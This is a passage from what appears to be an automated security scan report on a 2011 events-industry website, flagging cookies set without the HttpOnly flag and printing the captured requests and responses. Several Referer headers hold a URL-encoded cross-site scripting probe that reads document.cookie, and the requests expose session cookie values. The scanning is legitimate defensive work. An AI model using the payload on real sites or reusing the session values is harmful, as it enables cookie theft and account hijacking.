Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 16 Apr 2009 20:05:16 GMT
ETag: "200000000259b-16c9-467b195283319"
Accept-Ranges: bytes
Content-Length: 5833
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

$(document).ready(function(){
   
   // Cookie Stuff - Capture and Load.
   function cookieCapture() {
       $.cookie('sc_track_first_name', $('input[name=C_FirstName]').val(), { expires: 365, path: '/' });
...[SNIP]...

2.41. http://www2.starcite.com/starcite/misc/jquery/jquery-1.2.6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/jquery-1.2.6.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/jquery-1.2.6.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Fri, 08 Aug 2008 20:00:00 GMT
ETag: "10000000025a0-18764-453f84024f000"
Accept-Ranges: bytes
Content-Length: 100196
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

(function(){
/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Da
...[SNIP]...

2.42. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/jquery.cookie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/jquery.cookie.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 29 May 2008 15:50:25 GMT
ETag: "100000000259c-1096-44e607cd4f240"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...

2.43. http://www2.starcite.com/starcite/misc/jquery/jquery.validate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/jquery.validate.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/jquery.validate.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 07 Aug 2008 20:17:42 GMT
ETag: "100000000259f-8c32-453e4619a6580"
Accept-Ranges: bytes
Content-Length: 35890
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/*
* jQuery validation plug-in 1.4
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2008 J..rn Zaeffe
...[SNIP]...

2.44. http://www2.starcite.com/starcite/misc/jquery_new.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery_new.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery_new.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Tue, 02 Feb 2010 20:23:27 GMT
ETag: "1000000003159-114bb-47ea3dfd6adc0"
Accept-Ranges: bytes
Content-Length: 70843
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:38 GMT;path=/

/*!
* jQuery JavaScript Library v1.4.1
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

2.45. http://www2.starcite.com/starcite/misc/reset.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/reset.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/reset.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __unam=2392472-12d471e5d4f-40cdc366-1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:49 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.46. http://www2.starcite.com/starcite/modules/Suppliers_howitworks/howitworks.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/Suppliers_howitworks/howitworks.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/Suppliers_howitworks/howitworks.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Thu, 28 Aug 2008 17:38:00 GMT
ETag: "100000000296a-2cc-4558899238e00"
Accept-Ranges: bytes
Content-Length: 716
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function Suppliers_howitworks_form_validation(){
   var leftside_title    = document.getElementById('leftside_title').value;
   var middle_title    = document.getElementById('middle_title').value;
   var right
...[SNIP]...

2.47. http://www2.starcite.com/starcite/modules/addregions/addregions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/addregions/addregions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/addregions/addregions.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Tue, 04 Nov 2008 13:42:35 GMT
ETag: "10000000025ac-4f8-45add3c72ee83"
Accept-Ranges: bytes
Content-Length: 1272
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

function trim(str)
{
   return str.replace(/^\s*|\s*$/g,"");
}
function addregions_form_validation(){
   var country    = document.getElementById('name1').value;
   var region = document.getElementById('
...[SNIP]...

2.48. http://www2.starcite.com/starcite/modules/cck/content.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/cck/content.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/cck/content.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Fri, 10 Aug 2007 07:38:00 GMT
ETag: "10000000025ca-170-43753744f2600"
Accept-Ranges: bytes
Content-Length: 368
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

/* $Id: content.css,v 1.2.2.8 2007/08/09 19:08:16 yched Exp $ */

.field .field-label,
.field .field-label-inline,
.field .field-label-inline-first {
font-weight:bold;
}

.field .field-label-inline,
...[SNIP]...

2.49. http://www2.starcite.com/starcite/modules/cck/fieldgroup.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/cck/fieldgroup.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/cck/fieldgroup.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Fri, 09 Feb 2007 02:35:00 GMT
ETag: "10000000025d7-59-4290201941d00"
Accept-Ranges: bytes
Content-Length: 89
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

div.fieldgroup {
margin:.5em 0 1em 0;
}
div.fieldgroup .content {
padding-left:1em;
}

2.50. http://www2.starcite.com/starcite/modules/date/date.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "100000000263e-793-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 1939
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

.container-inline-date {
width:auto;
clear:both;
padding:0;
display: inline-block;
vertical-align:top;
margin-right: 0.5em;
}

.container-inline-date .form-item {
float:none;
padding:
...[SNIP]...

2.51. http://www2.starcite.com/starcite/modules/date/date_popup/themes/timeentry.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date_popup/themes/timeentry.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date_popup/themes/timeentry.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "1000000002670-1f6-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 502
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

/* timeEntry styles */
.timeEntry_control {
   vertical-align: middle;
   margin-left: 2px;
}
* html .timeEntry_control { /* IE only */
   margin-top: -4px;
}
/* Make sure background colors from other style
...[SNIP]...

2.52. http://www2.starcite.com/starcite/modules/date/date_popup/themes/white.calendar.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date_popup/themes/white.calendar.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date_popup/themes/white.calendar.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "1000000002671-e16-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 3606
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

** Reset link properties and then override them with !important */
#calendar_div a, .calendar_inline a {
   cursor: pointer;
   margin: 0;
   padding: 0;
   background-color: #fff;
   color: #000;
}

/* Main St
...[SNIP]...

2.53. http://www2.starcite.com/starcite/modules/date/date_timezone/date_timezone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/date/date_timezone/date_timezone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/date/date_timezone/date_timezone.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 00:38:00 GMT
ETag: "100000000267b-7cc-45720cc008a00"
Accept-Ranges: bytes
Content-Length: 1996
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

// $Id: date_timezone.js,v 1.1.2.3 2008/06/20 12:26:06 karens Exp $
/**
* Set the client's system time zone as default values of form fields.
*/
Drupal.setDefaultTimezone = function() {
var dateSt
...[SNIP]...

2.54. http://www2.starcite.com/starcite/modules/jstools/jquery.history_remote.pack.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/jquery.history_remote.pack.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/jquery.history_remote.pack.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Fri, 30 Nov 2007 10:35:00 GMT
ETag: "100000000273c-a22-44022fb897d00"
Accept-Ranges: bytes
Content-Length: 2594
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

/**
* History/Remote - jQuery plugin for enabling history support and bookmarking
* @requires jQuery v1.0.3
*
* http://stilbuero.de/jquery/history/
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.
...[SNIP]...

2.55. http://www2.starcite.com/starcite/modules/jstools/jstools.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/jstools.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/jstools.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Thu, 09 Aug 2007 09:56:00 GMT
ETag: "100000000273f-1914-4374143fe8c00"
Accept-Ranges: bytes
Content-Length: 6420
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

// $Id: jstools.js,v 1.9.2.8 2007/08/08 21:26:07 nedjo Exp $

Drupal.behaviors = Drupal.behaviors || {};

/**
* Attach registered behaviors.
*/
Drupal.attachBehaviors = function(context) {
context
...[SNIP]...

2.56. http://www2.starcite.com/starcite/modules/jstools/tabs/drupal-tabs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/drupal-tabs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/drupal-tabs.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 16:26:47 GMT
ETag: "10000000027d2-251-466a903e4fd1e"
Accept-Ranges: bytes
Content-Length: 593
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

html.js div.drupal-tabs {
display: none;
}
html.js h2.drupal-tabs-title {
display: none;
}
